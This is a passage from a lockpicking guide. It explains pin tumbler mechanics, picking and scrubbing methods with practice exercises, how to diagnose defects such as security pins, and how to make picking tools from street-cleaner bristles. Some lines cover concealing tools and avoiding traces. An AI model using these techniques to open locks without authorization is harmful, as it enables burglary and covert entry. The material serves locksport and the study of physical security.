entirely. Remember: There is always another way, usually a better one. .... Chapter 2 ... HOW A KEY OPENS A LOCK . This chapter presents the basic workings of pin tumbler locks, and the vocabulary used in the rest of this booklet. The terms used to describe locks and lock parts vary from manufacturer to manufacturer and from city to city, so even if you already understand the basic workings of locks, you should look at Figure 2.1 for the vocabulary. . Knowing how a lock works when it is opened by a key is only part of what you need to know. You also need to know how a lock responds to picking. Chapters 3 and 5 present models which will help you understand a lock's response to picking. . Figure 2.1 introduces the vocabulary of real locks. The key is inserted into the "keyway" of the "plug." The protrusions on the side of the keyway are called "wards." Wards restrict the set of keys that can be inserted into the plug. The plug is a cylinder which can rotate when the proper key is fully inserted. The non-rotating part of the lock is called the "hull." The first pin touched by the key is called pin one. The remaining pins are numbered increasingly toward the rear of the lock. . The proper key lifts each pin pair until the gap between the "key pin" and the "driver pin" reaches the "sheer line." When all the pins are in this position, the plug can rotate and the lock can be opened. An incorrect key will leave some of the pins protruding between the hull and the plug, and these pins will prevent the plug from rotating. .... Chapter 3 ... THE FLATLAND MODEL . In order to become good at picking locks, you will need a detailed understanding of how locks works and what happens as it is picked. This document uses two models to help you understand the behavior of locks. This chapter presents a model that highlights interactions between pin positions. Chapter 4 uses this model to explain how picking works. Chapter 9 will use this model to explain complicated mechanical defects. . The "flatland" model of a lock is shown in Figure 3.1 This is not a cross section of a real lock. It is a cross section of a very simple kind of lock. The purpose of this lock is to keep two plates of metal from sliding over each other unless the proper key is present. The lock is constructed by playing the two plates over each other and drilling holes which pass through both plates. The figure shows a two hole lock. Two pins are placed in each hole such that the gap between the pins does not line up with the gap between the plates. The bottom pin is called the "key pin" because it touches the key. The top pin is called the "driver pin." Often the driver and the key pins are just called the driver and the pin. A protrusion on the underside of the bottom plate keeps the pins from falling out, and a spring above the top plates pushed down on the driver pin. . If the key is absent, the plates cannot slide over each other because the driver pins pass through both plates. See Figure 3.3. That is, the key lifts the key pin until its top reaches the lock's sheer line. In this configuration the plates can slide past each other. . Figure 3.3 also illustrates one of the important features of real locks. There is always a sliding allowance. That is, any parts which will slide past each other must be separated by a gap. The gap between the top and bottom plates allows a range of keys to open the lock. Notice that the right key pin in Figure 3.3 is not raised as high as the left pin, yet the lock will still open. .... Chapter 4 .. BASIC PICKING & THE BINDING DEFECT . The flatland model highlights the basic defect that enables lockpicking to work. This defect makes it possible to open a lock by lifting the pins one at a time, and thus you don't need a key to lift all the pins at the same time. Figure 4.3 shows how the pins of a lock can be set one at a time. The first step of the procedure is to apply a sheer force to the lock by pushing on the bottom plate. This force causes one or more the of pins to be scissored between the top and bottom plate. The most common defect in a lock is that only one pin will bind. Figure 4.3a shows the left pin binding. Even though a pin is binding, it can be pushed up with a picking tool; see Figure 4.3b. When the top of the key pin reaches the sheer line, the bottom plate will slide slightly. If the pick is removed the driver pin will be held up by the overlapping bottom plate, and the key pin will drop down to its initial position; see Figure 4.3c. The slight movement of the bottom plate causes a new pin to bind. The same procedure can be used to set the new pin. . Thus, the procedure for "one pin at a time picking" a lock is to apply a sheer force, find the pin which is binding the most and push it up. When the top of the key pin reaches the sheer line, the moving portion of the lock will give slightly, and driver pin will be trapped above the sheer line. This is called "setting" a pin. . Chapter 9 discusses the different defects that cause pins to bind one at a time. . 1. Apply a sheer force. . 2. Find the pin that is binding the most. . 3. Push that pin up until you feel it set at the sheer line. . 4. Go to step 2. . Table 4.1: Figure 5: Picking a lock one pin at a time. .... Chapter 5 ... The Pin Column Model . The flatland model of locks can explain effects that involve more than one pin, but a different model is needed to explain the detailed behavior of a single pin. See Figure 5.1. The pin-column model highlights the relationship between the torque applied and the amount of force needed to lift each pin. It is essential that you understand this relationship. . In order to understand the "feel" of lockpicking you need to know how the movement of a pin is affected by the torque applied by your torque wrench (tensioner) and the pressure applied by your pick. A good way to represent this understanding is a graph that shows the minimum pressure needed to move a pin as a function of how far the pin has been displaced from its initial position. The remainder of this chapter will describe that force graph from the pin-column model. . Figure 5.2 shows a single pin position after torque has been applied to the plug. The forces acting on the driver pin are the friction from the sides, the spring contact force from above, and the contact force from the key pin below. The amount of pressure you apply to the pick determines the contact force from below. . The spring force increases as the pins are pushed into the hull, but the increase is slight, so we will assume that the spring force is constant over the range of displacements we are interested in. The pins will not move unless you apply enough pressure to overcome the spring force. The binding friction is proportional to how hard the driver pin is being scissored between the plug and the hull, which in this case is proportional to the torque. The more torque you apply to the plug, the harder it will be to move the pins. To make a pin move, you need to apply a pressure that is greater than the sum of the spring and friction forces. . When the bottom of the driver pin reaches the sheer line, the situation suddenly changes. See Figure 5.3. The friction binding force drops to zero and the plug rotates slightly (until some other pin binds). Now the only resistance to motion is the spring force. After the top of the key pin crosses the gap between the plug and the hull, a new contact force arises from the key pin striking the hull. This force can be quite large, and it causes a peak in the amount of pressure needed to move a pin. . If the pins are pushed further into the hull, the key pin acquires a binding friction like the driver pin had in the initial situation. See Figure 5.4. Thus, the amount of pressure needed to move the pins before and after the sheer line is about the same. Increasing the torque increases the required pressure. At the sheer line, the pressure increases dramatically due to the key pin hitting the hull. This analysis is summarized graphically in Figure 5.5. .... Chapter 6 ....Basic Scrubbing . At home you can take your time picking a lock, but in the field, speed is always essential. This chapter presents a lockpicking technique called "scrubbing" that can quickly open most locks. . The slow step in basic picking (Chapter 4) is locating the pin which is binding the most. The force diagram (Figure 5.5) developed in Chapter 5 suggests a fast way to select the correct pin to lift. Assume that all the pins could be characterized by the same force diagram. That is, assume that they all bind at once and that they all encounter the same friction. Now consider the effect of running the pick over all the pins with a pressure that is great enough to overcome the spring and friction forces but not great enough to overcome the collision force of the key pin hitting the hill. Any pressure that is above the flat portion of the force graph and below the top of the peak will work. As the pick passes over a pin, the pin will rise until it hits the hull, but it will not enter the hull. See Figure 5.3. The collision force at the sheer line resists the pressure of the pick, so the pick rides over the pin without pressing it into the hull. If the proper torque is being applied, the plug will rotate slightly. As the pick leaves the pin, the key pin will fall back to its initial position, but the driver pin will catch on the edge of the plug and stay above the sheer line. See Figure 6.1. In theory one stroke of the pick over the pins will cause the lock to open. . In practice, at most one or two pins will set during a single stroke of the pick, so several strokes are necessary. Basically, you use the pick to scrub back and forth over the pins while you adjust the amount of torque on the plug. The exercises in Chapter 8 will teach you how to choose the correct torque and pressure. . You will find that the pins of a lock tend to set in a particular order. Many factors effect this order (See Chapter 9), but the primary cause is a misalignment between the center axis of the plug and the axis on which the holes were drilled. See Figure 6.2. If the axis of the pin holes is skewed from the center line of the plug, then the pins will set from back to front if the plug is turned one way, and from front to back if the plug is turned the other way. Many locks have this defect. . Scrubbing is fast because you don't need to pay attention to individual pins. You only need to find the correct torque and pressure. Figure 6.1 summarizes the steps of picking a lock by scrubbing. The exercises will teach you how to recognize when a pin is set and how to apply the correct forces. If a lock doesn't open quickly, then it probably has one of the characteristics described in Chapter 9 and you will have to concentrate on individual pins. . 1. Insert the pick and torque wrench. Without . applying any torque pull the pick out to get . a feel for the stiffness of the lock's . springs. . 2. Apply a light torque. Insert the pick . without touching the pins. As you pull the . pick out, apply pressure to the pins. The . pressure should be slightly larger than the . minimum necessary to overcome the spring . force. . 3. Gradually increase the torque with each . stroke of the pick until pins begin to set. . 4. Keeping the torque fixed, scrub back and . fourth over the pins that have not set. If . additional pins do not set, release the . torque and start over with the torque found . in the last step. . 5. Once the majority of the pins have been set, . increase the torque and scrub the pins with . a slightly larger pressure. This will set . any pins which have not set low due to . beveled edges, etc. .. Table 6.1: Figure 13 - Basic scrubbing .... Chapter 7 ... Advanced Lockpicking . Simple lockpicking is a trade that anyone can learn. However, advanced lockpicking is a craft that requires mechanical sensitivity, physical dexterity, visual concentration and analytic thinking. If you strive to excel at lockpicking, you will grow in many ways. 7.1 Mechanical Skills . Learning how to pull the pick over the pins is surprisingly difficult. The problem is that the mechanical skills you learned early in life involved maintaining a fixed position or fixed path for your hands independent of the amount of force required. In lockpicking, you must learn how to apply a fixed force independent of the position of your hand. As you pull the pick out of the lock you want to apply a fixed pressure on the pins. The picks should bounce up and down in the keyway according to the resistance offered by each pin. . To pick a lock you need feedback about the effects of your manipulations. To get the feedback, you must train yourself to be sensitive the sound and the feel of the pick passing over the pins. This is a mechanical skill that can only be learned with practice. The exercises will help you recognize the important information coming from your fingers. 7.2 Zen and the Art of Lockpicking . In order to excel at lockpicking, you must train yourself to have a visually reconstructive imagination. The idea is to use information from all your senses to build a picture of what is happening inside the lock as you pick it. Basically, you want to project your senses into the lock to receive a full picture of how it is responding to your manipulations. Once you have learned how to build this picture, it is easy to choose manipulations that will open the lock. . All your senses provide information about the lock. Touch and sound provide the most information, but the other senses can reveal critical information. For example, your nose can tell whether a lock has been lubricated recently. As a beginner, you will need to use your eyes for hand-eye coordination, but as you improve you will find it unnecessary to look at the lock. In fact, it is better to ignore your eyes or your sight to build an image of the lock based on the information you receive from your fingers and ears. . The goal of this mental skill is to acquire a relaxed concentration on the lock. Don't force the concentration. Try to ignore the sensations and thoughts that are not related to the lock. Don't try to focus on the lock. 7.3 Analytic Thinking . Each lock has its own special characteristics which make picking harder or easier. If you learn to recognize and exploit the "personality traits" of locks, picking will go much faster. Basically, you want to analyze the feedback you get from the lock to diagnose its personality traits and then use your experience to decide on an approach to open a lock. Chapter 9 discusses a large number of common traits and ways to exploit or overcome them. . People underestimate the analytic involved in lockpicking. They think that the picking tool opens the lock. To them the torque wrench is a passive tool that just puts the lock under the desired stress. Let me propose another way to view the situation. The pick is just running over the pins to get information about the lock. Based on an analysis of that information, the torque is adjusted to make the pins set at the sheer line. It's the torque wrench that opens the lock. . Varying the torque as the picks moves in and out of the keyway is a general trick that can be used to get around several picking problems. For example, if the middle pins are set, but the ends pins are not, you can increase the torque as the pick moves over the middle pins. This will reduce the chances of disturbing the correctly set pins. If some pin doesn't seem to lift up far enough as the pick passes over it, then try reducing the torque on the next pass. . The skill of adjusting the torque while the pick is moving requires careful coordination between your hands, but as you become better at visualizing the process of picking the lock, you will become better at this important skill. .... Chapter 8 .... Exercises . This chapter presents a series of exercises that will help you learn the basic skill of lockpicking. Some exercises teach a single skill, while others stress the coordination of skills. . When you do these exercises, focus on the skills, not on opening the lock. If you focus on opening the lock, you will get frustrated and your mind will stop learning. The goal of each exercise is to learn something about the particular lock you are holding and something about yourself. If a lock happens to open, focus on the memory of what you were doing and what you felt just before it opened. . These exercises should be practiced in short sessions. After about thirty minutes you will find that your fingers become sore and your mind looses its ability to achieve relaxed concentration. 8.1 Exercise 1: Bouncing the pick . This exercise helps you learn the skill of applying a fixed pressure with the pick independent of how the pick moves up and down in the lock. Basically you want to learn how to let the pick bounce up and down according to the resistance offered by each pin. . How you hold the pick makes a different on how easy it is to apply a fixed pressure. You want to hold it in such a way that the pressure comes from your fingers or your wrist. Your elbow and shoulder do not have the dexterity required to pick locks. While you are scrubbing a lock notice which of your joints are fixed, and which are allowed to move. The moving joints are providing the pressure. . One way to hold a pick is to use two fingers to provide a pivot point while another finger levers the pick to provide the pressure. Which fingers you use is a matter of personal choice. Another way to hold the pick is like holding a pencil. With this method, your wrist provides the pressure. If your wrist is providing the pressure, your shoulder and elbow should provide the force to move the pick in and out of the lock. Do not use your wrist to both move the pick and apply pressure. . A good way to get used to the feel of the pick bouncing up and down in the keyway is to try scrubbing over the pins of an open lock. The pins cannot be pushed down, so the pick must adjust to the heights of the pins. Try to feel the pins rattle as the pick moves over them. If you move the pick quickly, you can hear the rattle. This same rattling feel will help you recognize when a pin is set correctly. If a pin appears to be set but it doesn't rattle, then it is false set. False set pins can be fixed by pushing them down farther, or by releasing torque and letting them pop back to their initial position. . One last word of advice. Focus on the tip of the pick. Don't think about how you are moving the handle; think about how you are moving the tip of the pick. 8.2 Exercise 2: Picking pressure . This exercise will teach you the range of pressures you will need to apply with a pick. When you are starting, just apply pressure when you are drawing the pick out of the lock. Once you have mastered that, try applying pressure when the pick is moving inward. . With the flat side of your pick, push down on the first pin of a lock. Don't apply any torque to the lock. The amount of pressure you are applying should be just enough to overcome the spring force. This force gives you an idea of the minimum pressure you will apply with a pick. . The spring force increases as you push the pin down. See if you can feel this increase. . Now see how it feels to push down the other pins as you pull the pick out of the lock. Start out with both the pick and torque wrench in the lock, but don't apply any torque. As you draw the pick out of the lock, apply enough pressure to push each pin all the way down. . The pins should spring back as the pick goes past them. Notice the sound that the pins make as they spring back. Notice the popping feel as a pick goes past each pin. Notice the springy feel as the pick pushes down on each new pin. . To help you focus on these sensations, try counting the number of pins in the lock. Door locks at MIT have seven pins; padlocks usually have four. . To get an idea of the maximum pressure, use the flat side of your pick to push down all the pins in the lock. Sometimes you will need to apply this much pressure to a single pin. If you encounter a new kind of lock, perform this exercise to determine the stiffness of its springs. 8.3 Exercise 3: Picking Torque . This exercise will teach you the range of torque you will need to apply to a lock. It demonstrates the interaction between the torque and pressure which was described in Chapter 5. . The minimum torque you will use is just enough to overcome the friction of rotating the plug in the hull. Use your torque wrench to rotate the plug until it stops. Notice how much torque is needed to move the plug before the pins bind. This force can be quite high for locks that have been left out in the rain. The minimum torque for padlocks includes the force of a spring that is attached between the plug and the shackle bolt. . To get a feel for the maximum value of torque, use the flat side of the pick to push all the pins down, and try applying enough torque to make the pins stay down after the pick is removed. If your torque wrench has a twist in it, you may not be able to hold down more than a few pins. . If you use too much torque and too much pressure you can get into a situation like the one you just created. The key pins are pushed too far into the hull and the torque is sufficient to hold them there. . The range of picking torque can be found by gradually increasing the torque while scrubbing the pins with the pick. some of the pins will become harder to push down. Gradually increase the torque until some of the pins set. These pins will loose their springiness. Keeping the torque fixed, use the pick to scrub the pins a few times to see if other pins will set. . The most common mistakes of beginners is to use too much torque. Use this exercise to find the minimum torque required to pick the lock. 8.4 Exercise 4: Identifying Set Pins . While you are picking a lock, try to identify which pins are set. You can tell a pin is set because it will have a slight give. That is, the pin can be pushed down a short distance with a light pressure, but it becomes hard to move after that distance (see Chapter 6 for an explanation). When you remove the light pressure, the pin springs back up slightly. Set pins also rattle if you flick them with the pick. Try listening for that sound. . Run the pick over the pins and try to decide whether the set pins are in the front or back of the lock (or both). Try identifying exactly which pins are set. Remember that pin one is the frontmost pin (i.e., the pin that a key touches first). The most important skill of lockpicking is the ability to recognize correctly set pins. This exercise will teach you that skill. . Try repeating this exercise with the plug turning in the other direction. If the front pins set when the plug is turned one way, the back pins will set when the plug is turned the other way. See Figure 6.2 for an explanation. . One way to verify how many pins are set is to release the torque, and count the clicks as the pins snap back to their initial position. Try this. Try to notice the difference in sound between the snap of a single pin and the snap of two pins at once. A pin that has been false set will also make a snapping sound. . Try this exercise with different amounts of torque and pressure. You should notice that a larger torque requires a larger pressure to make pins set correctly. If the pressure is too high, the pins will be jammed into the hull and stay there. 8.5 Exercise 5: Projection . As you are doing the exercises, try building a picture in your mind of what is going on. The picture does not have to be visual, it could be a rough understanding of which pins are set and how much resistance you are encountering from each pin. One way to foster this picture building is to try to remember your sensations and beliefs about a lock just before it opened. When a lock opens, don't thing "that's over", think "what happened." . This exercise requires a lock that you find easy to pick. It will help you refine the visual skills you need to master lockpicking. Pick the lock, and try to remember how the process felt. Rehearse in your mind how everything feels when the lock is picked properly. Basically, you want to create a movie that records the process of picking the lock. Visualize the motion of your muscles as they apply the correct pressure and torque, and feel the resistance encountered by the pick. Now pick the lock again trying to match your actions to the movie. . By repeating this exercise, you are learning how to formulate detailed commands for your muscles and how to interpret feedback from your senses. The mental rehearsal teaches you how to build a visual understanding of the lock and how to recognize the major steps of picking it. .... Chapter 9 .. Recognizing and Exploiting Personality Traits . Real locks have a wide range of mechanical features and defects that help and hinder lockpicking. If a lock doesn't respond to scrubbing, then it probably has one of the traits discussed in this chapter. To open the lock, you must diagnose the trait and apply the recommended technique. The exercises will help you develop the mechanical sensitivity and dexterity necessary to recognize and exploit the different traits. 9.1 Which Way To Turn . It can be very frustrating to spend a long time picking a lock and then discover that you turned the plug the wrong way. If you turn a plug the wrong way it will rotate freely until it hits a stop, or until it rotates 180 degrees and the drivers enter the keyway (see Section 9.11). Section 9.11 also explains how to turn the plug more than 180 degrees if that is necessary to fully retract the bolt. When the plug is turned in the correct direction, you should feel an extra resistance when the plug cam engages the bolt spring. . The direction to turn the plug depends on the bolt mechanism, not on the lock, but here are some general rules. Cheap padlocks will open if the plug is turned in either direction, so you can chose the direction which is best for the torque wrench. All padlocks made by the Master company can be opened in either direction. Padlocks made by Yale will only open if the plug is turned clockwise. The double plug Yale cylinder locks generally open by turning the bottom of the keyway (i.e., the flat edge of the key) away from the nearest door frame. Single plug cylinder locks also follow this rule. See Figure 9.1. Locks built into the doorknob usually open clockwise. Desk and filing cabinet locks also tend to open clockwise. . When you encounter a new kind of lock mechanism, try turning the plug in both directions. In the correct direction, the plug will be stopped by the pins, so the stop will feel mushy when you use heavy torque. In the wrong direction the plug will be stopped by a metal tab, so the stop will feel solid. 9.2 How Far to Turn . The companion question to which way to turn a lock is how far to turn it. Desk and filing cabinet locks generally open with less than a quarter turn. Locks which are separate from the doorknob tend to require a half turn to open. Deadbolt lock mechanisms can require almost a full turn to open. . Turning a lock more than 180 degrees is difficult because the drivers enter the bottom of the keyway. See Section 9.11. 9.3 Gravity . Picking a lock that has the springs at the top is different than picking one with the springs at the bottom. It should be obvious how to tell the two apart. The nice feature of a lock with the springs at the bottom is that gravity holds the key pins down once they set. With the set pins out of the way, it is easy to find and manipulate the remaining unset pins. It is also straight forward to test for the slight give of a correctly set pin. When the springs are on top, gravity will pull the key pins down after the driver pin catches at the sheer line. In this case, you can identify the set pins by noticing that the key pin is easy to lift and that it does not feel springy. Set pins also rattle as you draw the pick over them because they are not being pushed down by the driver pin. 9.4 Pins Not Setting . If you scrub a lock and pins are not setting even when you vary the torque, then some pin has a false set and it is keeping the rest of the pins from setting. Consider a lock whose pins appear to set from back to front. If the backmost pin false sets high or low (see Figure 9.2), then the plug cannot rotate enough to allow the other bins to bind. It is hard to recognize that a pin has false set because the springiness of the front pins makes it hard to sense the small give of a correctly set back pin. The main symptom of this situation is that the other pins will not set unless a very large torque is applied. . When you encounter this situation, release the torque and start over by concentrating on the back pins. Try a light torque and moderate pressure, or heavy torque and heavy pressure. Try to feel for the click that happens when a pin reaches the sheer line and the plug rotates slightly. The click will be easier to feel if you use a stiff torque wrench. 9.5 Elastic Deformation . The interesting events of lockpicking happen over distances measured in thousandths of an inch. Over such short distances, metals behave like springs. Very little force is necessary to deflect a piece metal over those distances, and when the force is removed, the metal will spring back to its original position. . Deformation can be used to your advantage if you want to force several pins to bind at once. For example, picking a lock with pins that prefer to be set from front to back is slow because the pins set one at a time. This is particularly true if you only apply pressure as the pick is drawn out of the lock. Each pass of the pick will only set the frontmost pin that is binding. Numerous passes are required to set all the pins. If the preference for setting is not very strong (i.e., the axis of the plug holes is only slightly skewed from the plug's center line), then you can cause additional pins to bind by applying extra torque. Basically, the torque puts a twist in the plug that causes the front of the plug to be deflected further than the back of the plug. With light torque, the back of the plug stays in its initial position, but with medium to heavy torque, the front pin columns bend enough to allow the back of the plug to rotate and thus cause the back pins to bind. With the extra torque, a single stroke of the pick can set several pins, and the lock can be opened quickly. Too much torque causes its own problems. . When the torque is large, the front pins and plug holes can be deformed enough to prevent the pins from setting correctly. In particular, the first pin tends to false set low. Figure 9.2 shows how excess torque can deform the bottom of the driver pin and prevent the key pin from reaching the sheer line. This situation can be recognized by the lack of give in the first pin. Correctly set pins feel springy if they are pressed down slightly. A falsely set pin lacks this springiness. The solution is to press down hard on the first pin. You may want to reduce the torque slightly, but if you reduce torque too much then the other pins will unset as the first pin is being depressed. . It is also possible to deform the top of the key pin. The key pin is scissored between the plug and the hull and stays fixed. When this happens, the pin is said to be "false set high." 9.6 Loose Plug . The plug is held in the hull by being wider at the front and by having a cam on the back that is bigger than the hole drilled into the hull. If the cam is not properly installed, the plug can move in and out of the lock slightly. On the outward stroke of the pick, the plug will move forward and in and out of the lock slightly. On the outward stroke of the pick, the plug will move forward, and if you apply pressure on the inward stroke, the plug will be pushed back. . The problem with a loose plug is that the driver pins tend to set on the back of the plug holes rather than on the sides of the holes. When you push the plug in, the drivers will unset. You can use this defect to your advantage by only applying pressure on the outward or inward stroke of the pick. Alternatively, you can use your finger or torque wrench to prevent the plug from moving forward. 9.7 Pin Diameter . When the pair of pins in a particular column have different diameters, that column will react strangely to the pressure of the pick. . The top half of Figure 9.3 shows a pin column with a driver pin that has a larger diameter than the key pin. As the pins are lifted, the picking pressure is resisted by the binding friction and the spring force. Once the driver clears the sheer line, the plug rotates (until some other pin binds) and the only resistance to motion is the spring force. If the key pin is small enough and the plug did not rotate very far, the key pin can enter the hull without colliding with the edge of the hull. Some other pin is binding, so again the only resistance to motion is the spring force. This relationship is graphed in the bottom half of the figure. Basically, the pins feel normal at first, but then the lock clicks and the pin becomes springy. The narrow key pin can be pushed all the way into the hull without loosing its springiness, but when the picking pressure is released, the key pin will fall back to its initial position while the large driver catches on the edge of the plug hole. . The problem with a large driver pin is that the key pin tends to get in the hull when some other pin sets. Imagine that a neighboring pin sets and the plug rotates enough to bind the narrow key pin. If the pick was pressing down on the narrow key pin at the same time as it was pressing down on the pin that set, then the narrow key pin will be in the hull and it will get stuck there when the plug rotates. . The behavior of a large key pin is left as an exercise for the reader. 9.8 Beveled Holes and Rounded pins . Some lock manufacturers (e.g., Yale) bevel the edges of the plug holes and/or round off the ends of the key pins. This tends to reduce the wear on the lock and it can both help and hinder lockpicking. You can recognize a lock with these features by the large give in set pins. See Figure 9.4. That is, the distance between the height at which the driver pin catches on the edge of the plug hole and the height at which the driver pin catches on the edge of the plug hole and the height at which the key pin hits the hull is larger (sometimes as large as a sixteenth of an inch) when the plug holes are beveled or the pins are rounded. While the key pin is moving between those two heights, the only resistance to motion will be the force of the spring. There won't be any binding friction. This corresponds to the dip in the force graph shown in Figure 5.5 . A lock with beveled plug holes requires more scrubbing to open than a lock without beveled holes because the driver pins set on the bevel instead of setting on the top of the plug. The plug will not turn if one of the drivers is caught on a bevel. The key pin must be scrubbed again to push the driver pin up and off the bevel. The left driver pin in Figure 9.6a is set. The driver is resting on the bevel, and the bottom plate has moved enough to allow the right driver to bind. Figure 9.6b shows what happens after the right driver pin sets. The bottom plate slides further to the right and now the left driver pin is scissored between the bevel and the top plate. It is caught on the bevel. To open the lock, the left driver pin must be pushed up above the bevel. Once that driver is free, the bottom plate can slide and the right driver may bind on its bevel. . If you encounter a lock with beveled plug holes, and all the pins appear to be set but the lock is not opening, you should reduce torque and continue scrubbing over the pins. The reduced torque will make it easier to push the drivers off the bevels. If pins unset when you reduce the torque, try increasing the torque and picking pressure. The problem with increasing the force is that you may jam some key pins into the hull. 9.9 Mushroom Driver Pins . A general trick that lock makers use to make picking harder is to modify the shape of the driver pin. The most popular shapes are mushroom, spool and serrated; see Figure 9.7. The purpose of these shapes is to cause the pins to false set low. These drivers stop a picking technique called vibration picking (see Section 9.12), but they only slightly complicate scrubbing and one-pin-at-a-time picking (see Chapter 4). . If you pick a lock and the plug stops turning after a few degrees and none of the pins can be pushed up any further, then you known that the lock has modified drivers. Basically, the lip of the driver has caught at the sheer line. See the bottom of Figure 9.7. Mushroom and spool drivers are often found in Russwin locks, and locks that have several spacers for master keying. . You can identify the positions with the mushroom drivers by applying a light torque and pushing up on each pin. The pins with mushroom drivers will exhibit a tendency to bring the plug back to the fully locked position. By pushing the key pin up you are pushing the flat top of the key pin against the tilted bottom of the mushroom driver. This causes the drive to straighten up which in turn causes the plug to unrotate. You can use this motion to identify the columns that have mushroom drivers. Push those pins up to sheer line; even if you lose some of the other pins in the process they will be easier to re-pick than the pins with mushroom drivers. Eventually all the pins will be correctly set at the sheer line. . One way to identify all the positions with mushroom drivers is to use the flat of your pick to push all the pins up about halfway. This should put most of the drivers in their cockable position and you can feel for them. . To pick a lock with modified drivers, use a lighter torque and heavier pressure. you want to error on the side of pushing the key pins too far into the hull. In fact, another way to pick these locks is to use the flat side of your pick to push the pins up all the way, and apply very heavy torque to hold them there. Use a scrubbing action to vibrate the key pins while you slowly reduce the torque. Reducing the torque reduces the binding friction on the pins. The vibration and spring force cause the key pins to slide down to the sheer line. . The key to picking locks with modified drivers is recognizing incorrectly set pins. A mushroom driver set on its lip will not have the springy give of a correctly set driver. Practice recognizing the difference. 9.10 Master Keys . Many applications require keys that open only a single lock and keys that open a group of locks. The keys that open a single lock are called "change keys" and the keys that open multiple locks are called "master keys." To allow both the change key and the master key to open the same lock, a locksmith adds an extra pin called a "spacer" to some of the pin columns. See Figure 9.8. The effect of the spacer is to create two gaps in the pin column that could be lined up with the sheer line. Usually the change key aligns the top of the spacer with the sheer line, and the master key aligns the bottom of the spacer with the sheer line (the idea is to prevent people from filing down a change key to get a master key). In either case the plug is free to rotate. . In general, spacers make a lock easier to pick. They increase the number of opportunities to set each pin, and they make it more likely that the lock can by opened by setting all the pins at about the same height. In most cases only two or three positions will have spacers. You can recognize a position with a spacer by the two clicks you feel when the pin is pushed down. If the spacer has a smaller diameter than the driver and key pins, then you will feel a wide springy region because the spacer will not bind as it passes through the sheer line. It is more common for the spacer to be larger than the driver pin. You can recognize this by an increase in friction when the spacer passes through the sheer line. Since the spacer is larger than the driver pin, it will also catch better on the plug. If you push the spacer further into the hull, you will feel a strong click when the bottom of the spacer clears the sheer line. . Thin spacers can cause serious problems. If you apply heavy torque and the plug has beveled holes, the spacer can twist and jam at the sheer line. It is also possible for the spacer to fall into the keyway if the plug is rotated 180 degrees. See Section 9.11 for the solution to this problem. 9.11 Driver or Spacer Enters Keyway . Figure 9.9 shows how a spacer or driver pin can enter the keyway when the plug is rotated 180 degrees. You can prevent this by placing the flat side of your pick in the bottom of the keyway BEFORE you turn the plug too far. If a spacer or driver does enter the keyway and prevent you from turning the plug, use the flat side of your pick to push the spacer back into the hull. You may need to use the torque wrench to relieve any sheer force that is binding the spacer or driver. If that doesn't work, try raking over the drivers with the pointed side of your pick. If a spacer falls into the keyway completely, the only option is to remove it. A hook shaped piece of spring steel works well for this, though a bent paperclip will work just as well unless the spacer becomes wedged. 9.12 Vibration Picking . Vibration picking works by creating a large gap between the key and driver pins. The underlying principle is familiar to anyone who has played pool. When the queue ball strikes another ball squarely, the queue ball stops and the other ball heads off with the same speed and direction as the queue ball. Now imagine a device that kicks the tips of all the key pins. The key pins would transfer their momentum to the driver pins which would fly up into the hull. If you are applying a light torque when this happens, the plug will rotate when all the drivers are above the sheer line. 9.13 Disk Tumblers . The inexpensive locks found on desks use metal disks instead of pins. Figure 9.10 shows the basic workings of these locks. The disks have the same outline but differ in the placement of the rectangular cut. . These locks are easy to pick with the right tools. Because the disks are placed close together a half-round pick works better than a half-diamond pick (see Figure A.1). You may also need a torque wrench with a narrower head. Use moderate to heavy torque. .... Chapter 10 .... Final Remarks . Lockpicking is a craft, not a science. This document presents the knowledge and skills that are essential to lockpicking, but more importantly it provides you with models and exercises that will help you study locks on your own. To excel at lockpicking, you must practice and develop a style which fits you personally. Remember that the best technique is the one that works best for you. .... Appendix A .... Tools . This appendix describes the design and . construction of lockpicking tools. A.1 Pick Shapes . Picks come in several shapes and sizes. Figure A.1 shows the most common shapes. The handle and tang of a pick are the same for all picks. The handle must be comfortable and the tang must be thin enough to avoid bumping pins unnecessarily. If the tang is too thin, then it will act like a spring and you will loose the feel of the tip interacting with the pins. The shape of the tip determines how easily the pick passes over the pins and what kind of feedback you get from each pin. . The design of a tip is a compromise between the ease of insertion, ease of withdrawal and feel of the interaction. The half diamond tip with shallow angles is easy to insert and remove, so you can apply pressure when the pick is moving in either direction. It can quickly pick a lock that has little variation in the lengths of the key pins. If the lock requires a key that has a deep cut between two shallow cuts, the pick may not be able to push the middle pin down far enough. The half diamond pick with steep angles could deal with such a lock, and in general steep angles give you better feedback about the pins. Unfortunately, the steep angles make it harder to move the pick in the lock. A tip that has a shallow front angle and a steep back angle works well for Yale locks. . The half round tip works well in a disk tumbler lock. See Section 9.13. The full diamond and full round tips are useful for locks that have pins at the top and bottom of the keyway. . The rake tip is designed for picking pins one by one. It can also be used to rake over the pins, but the pressure can only be applied as the pick is withdrawn. The rake tip allows you to carefully feel each pin and apply varying amounts of pressure. Some rake tips are flat or dented on the top to make it easier to align the pick on the pin. The primary benefit of picking pins one at a time is that you avoid scratching the pins. Scrubbing scratches the tips of the pins and the keyway, and it spreads metal dust throughout the lock. If you want to avoid leaving traces, you must avoid scrubbing. . The snake tip can be used for scrubbing or picking. When scrubbing, the multiple bumps generate more action than a regular pick. The snake tip is particularly good at opening five-pin household locks. When a snake tip is used for picking, it can set two or three pins at once. Basically, the snake pick acts like a segment of a key which can be adjusted by lifting and lowering the tip, by tilting it back and forth, and by using either the top or bottom of the tip. You should use moderate to heavy torque with a snake pick to allow several pins to bind at the same time. This style of picking is faster than using a rake and it leaves as little evidence. A.2 Street Cleaner Bristles . The spring steel bristles used on street cleaners make excellent tools for lockpicking. The bristles have the right thickness and width, and they are easy to grind into the desired shape. The resulting tools are springy and strong. Section A.3 describes how to make tools that are less springy. . The first step in making tools is to sand off any rust on the bristles. Course grit sand paper works fine as does steel wool cleaning pad (not copper wool). If the edges or tip of the bristle are worn down, use a file to make them square. . A torque wrench has a head and a handle as shown in Figure A.2. The head is usually 1/2 to 3/4 of an inch long and the handle varies from 2 to 4 inches long. The head and the handle are separated by a bend that is about 80 degrees. The head must be long enough to reach over any protrusions (such as a grip- proof collar) and firmly engage the plug. A long handle allows delicate control over torque, but if it is too long, it will bump against the door frame. The handle, head and bend angle can be made quite small if you want to make tools that are easy to conceal (e.g., in a pen, flashlight or belt buckle). Some torque wrenches have a 90 degree twist in the handle. The twist makes it easy to control the torque by controlling how far the handle has been deflected from its rest position. The handle acts as a spring which sets the torque. The disadvantage of this method of setting the torque is that you get less feedback about the rotation of the plug. To pick difficult locks you will need to learn how to apply a steady torque via a stiff handled torque wrench. . The width of the head of a torque 